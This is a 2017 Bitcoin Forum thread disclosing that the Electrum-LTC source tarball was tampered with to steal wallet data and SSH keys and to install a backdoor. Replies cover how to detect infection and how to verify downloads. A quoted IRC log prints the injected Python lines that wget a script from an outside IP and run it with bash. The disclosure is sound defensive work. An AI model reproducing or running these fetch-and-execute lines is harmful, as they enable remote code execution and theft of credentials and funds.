Bitcoin Forum
December 13, 2024, 04:42:37 PM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Warning: electrum-ltc source downloads (from electrum-ltc.org) were tampered  (Read 562 times)
elelel (OP)
Newbie
*
Offline Offline

Activity: 4
Merit: 0


View Profile
August 01, 2017, 01:04:33 PM
 #1

I know this account is new and the following will therefore may seem a bit like a smear campaign against the electrum-ltc dev. I can guarantee that the following statements are true and everything happened as described.

On July 30 I tried to install electrum-ltc but stopped in the process because the checksums were missing (404 Not Found).

On July 31 I tried again. This time the checksums (available in Electrum-LTC-2.8.3.5.tar.gz.DIGESTS.txt) were available. The checksums didn't match the downloaded archive!

Due to this mismatch I compared the download to the version available @ github.com.
My Result: Electrum-LTC-2.8.3.5.tar.gz (available at https://electrum-ltc.org/download/Electrum-LTC-2.8.3.5.tar.gz) was modified to download a shell script. This shell script proceeds to collect various files (wallet data for various wallets and ssh-keys) and sends them to a server. Additionally it installs a cronjob and a backdoor (based on socat).

As far as I know this issue only affects Unix/Mac users but I can't guarantee that there aren't payloads for other operating systems.

I've informed pooler (the electrum-ltc dev) at the irc and he confirmed that the files were tampered. Currently the downloads are restored to a clean state. Sadly it seems like the developer didn't see any reason to inform his users about the issue. It looks like there is now a new hint reading "Always verify the digital signatures of the files you download!" (it wasn't there before: Proof)

Affected (Linux/Mac) users should be able to identify the infected electrum file by searching for 'import subprocess' or identify infected systems by checking their cronjobs.

Please don't ignore this post because my account is newly created. Members of #electrum-ltc or affected users should be able to confirm this report.

IRC log:
Quote
(18:39:45) got_inf3cted: Hello. Is it possible that https://electrum-ltc.org/download/Electrum-LTC-2.8.3.5.tar.gz is currently infected?
(18:59:29) skace: wait for pooler to respond
(18:59:38) skace: define infected
(19:00:58) pooler: got_inf3cted: what makes you think that?
(19:01:12) pooler: also, that's the source tarball, it's not even executable.
(19:02:00) got_inf3cted: The checksums aren't matching
(19:02:31) got_inf3cted: And of course:
(19:02:31) got_inf3cted: > subprocess.Popen(["wget", "http://80.67.8.195/script", "-O/tmp/script"], stdin=subprocess.PIPE, stderr=subprocess.PIPE)
(19:02:31) got_inf3cted: > subprocess.Popen(["bash", "/tmp/script"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
(19:02:55) skace: oh nice
(19:03:39) pooler: let me check
(19:04:05) got_inf3cted: The checksum file was unavailable yesterday. Today it is restored (and unchanged) but the .tar.gz is moddified
(19:06:18) skace: got hacked?
(19:19:43) got_inf3cted: How are your checks going pooler? Cheesy
(19:20:39) skace: i assume he is busy now
(19:20:41) skace: let him be Tongue
(19:22:25) got_inf3cted: It should be quite easy to confirm my findings and report back and take down the downloads/pages/servers (if needed)
(19:29:53) pooler: sorry, i have quite a few things on my plate
(19:30:09) pooler: the file was indeed compromised, trying to understand how


fab1o978
Newbie
*
Offline Offline

Activity: 13
Merit: 0


View Profile
August 01, 2017, 02:17:58 PM
 #2

Thank you! I downloaded my Electrum Cash client (for windows) yesterday, i will check if i can trust it or if i need to download it again.
GitCrush
Newbie
*
Offline Offline

Activity: 7
Merit: 0


View Profile
August 01, 2017, 02:34:34 PM
 #3

Many thanks for the info!

That's a serious issue which should not get overlooked.
I just realized I donloaded Unix Electrum-Ltc on July 22nd.
Version 2.8.3.5 was supposedly released one day later. Is there any definite information to narrow down the exact timeframe of that infection?

You just wrote
Quote
the shell scriptproceeds to collect various files (wallet data for various wallets and ssh-keys)

Would that mean my sensitive data from other clients, such as Bitcoin Electrum or Jaxx wallet could be endangered?

maidenmaden
Newbie
*
Offline Offline

Activity: 6
Merit: 0


View Profile
August 01, 2017, 02:40:38 PM
Last edit: August 01, 2017, 02:52:07 PM by maidenmaden
 #4

Quote
Would that mean my sensitive data from other clients, such as Bitcoin Electrum or Jaxx wallet could be endangered?

Well, from what I've read it is worse. This is effectively able to execute arbitrary code downloaded from that ip in the code snippet from the chat log he posted. But in short: yes, but worse.

But he already wrote how to check if you're infected, just search in the electrum file for "subprocess", this should not be there from what I can see from the official source code, so any occurance would indicate an infection.

Btw. I would guess that it is unlikely that you've got an infected version, as probably your coins would be already gone Wink, but better check twice though.


Edit: and a suggestion to all of you: You should know that checking against checksums, like this is now stated on their site is no protection! They can be manipulated as well, what you should expect are gpg signed checksums instead from a trusted source. If someone takes over their site, which seems to just happened, those hashes and provided ascs and even the information of the signer fo their archives wont save you either, as the hackers just manipulate those too! Yes I know there is an additional signing, but I bet no one of you could make a difference out of it as you probably don't know who should have signed it and all the contents could be manipulated. But hey, you're downloading third party software outside of a controlled environment like your package manager don't you? So expect this to happen...
GitCrush
Newbie
*
Offline Offline

Activity: 7
Merit: 0


View Profile
August 01, 2017, 02:50:05 PM
 #5

In fact, my LiteCoins stored in that wallet are already gone!  Wink
 
But that's due to the fact that I changed my few Litecoins into BTC.
For some reasons, my primary wallet Jaxx refused to send them out. So I installed Electrum-Ltc on that day. 
The only worry I have now that both BTC-Electrum and Vialectrum on my Fedora-machine could be compromised.

Annoyingly enough, I do not have physical access to that workstation until next week. So I have to wait and see...
maidenmaden
Newbie
*
Offline Offline

Activity: 6
Merit: 0


View Profile
August 01, 2017, 02:53:32 PM
 #6

In fact, my LiteCoins stored in that wallet are already gone!  Wink
 
But that's due to the fact that I changed my few Litecoins into BTC.
For some reasons, my primary wallet Jaxx refused to send them out. So I installed Electrum-Ltc on that day.  
The only worry I have now that both BTC-Electrum and Vialectrum on my Fedora-machine could be compromised.

Annoyingly enough, I do not have physical access to that workstation until next week. So I have to wait and see...

Good for you Smiley, for your other machines, best of luck to you that they are not affected.
GitCrush
Newbie
*
Offline Offline

Activity: 7
Merit: 0


View Profile
August 01, 2017, 02:58:46 PM
 #7

Many thanks again for you help and providing the info!
And yes, I should definitely insist on signed checksum in the future.
maidenmaden
Newbie
*
Offline Offline

Activity: 6
Merit: 0


View Profile
August 01, 2017, 03:02:32 PM
 #8

And at best those come from a source not that easy to manipulate Wink
maidenmaden
Newbie
*
Offline Offline

Activity: 6
Merit: 0


View Profile
August 01, 2017, 04:38:27 PM
 #9

Seems like you don't need to be worried anymore. They have posted a statement https://electrum-ltc.org/ that states the attack happened not before the 31st of July though.
elelel (OP)
Newbie
*
Offline Offline

Activity: 4
Merit: 0


View Profile
August 01, 2017, 05:39:25 PM
 #10

Quote
So I installed Electrum-Ltc on that day.
The only worry I have now that both BTC-Electrum and Vialectrum on my Fedora-machine could be compromised.

I don't know which of the mentioned days you meant. I don't know if the deployed script was changed (it is not available anymore) but the version I've seen did care for ~/.electrum but not for Viaelectrum
Route66Retro
Member
**
Offline Offline

Activity: 80
Merit: 10

Bitcoin chick


View Profile
August 01, 2017, 06:14:24 PM
 #11

I downloaded the Windows version at 17:28 UTC yesterday.  How can I find out if I have been infected?

Losing is not my enemy...fear of losing is my enemy.  -Rafael Nadal
elelel (OP)
Newbie
*
Offline Offline

Activity: 4
Merit: 0


View Profile
August 01, 2017, 07:47:57 PM
 #12

Simply look up the checksums and check if they are matching your downloaded version. If they don't match you probably got infected...
schnib
Sr. Member
****
Offline Offline

Activity: 270
Merit: 250


View Profile
August 01, 2017, 09:29:09 PM
 #13

what are the checksums ?
and is it just electrum litecoin or regular electrum as well?

What about electron cash ?

so many questions Smiley


Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!